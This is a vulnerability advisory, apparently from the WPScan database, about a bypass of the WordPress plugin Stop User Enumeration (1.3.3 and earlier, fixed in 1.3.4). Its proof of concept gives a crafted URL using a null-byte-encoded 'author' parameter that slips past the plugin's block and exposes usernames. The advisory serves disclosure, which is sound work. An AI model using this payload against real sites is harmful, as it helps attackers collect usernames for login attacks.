Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass



Description 
Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames.
Proof of Concept 
Blocked: http://www.example.com/?author%00=%001
Passed: http://www.example.com/?bypass=1&author%00=1

Affects Plugin

Stop User Enumeration
fixed in version 1.3.4

References

URL https://wordpress.org/plugins/stop-user-enumeration/changelog/
URL https://plugins.trac.wordpress.org/changeset/1390935/stop-user-enumeration

Classification

Type BYPASS

Miscellaneous

Submitter Carlos Montiers Aguilera
Views 4504
Verified No
WPVDB ID 8436

Timeline

Publicly Published 2016-04-01 (almost 4 years ago)
Added 2016-04-11 (almost 4 years ago)
Last Updated 2019-10-31 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin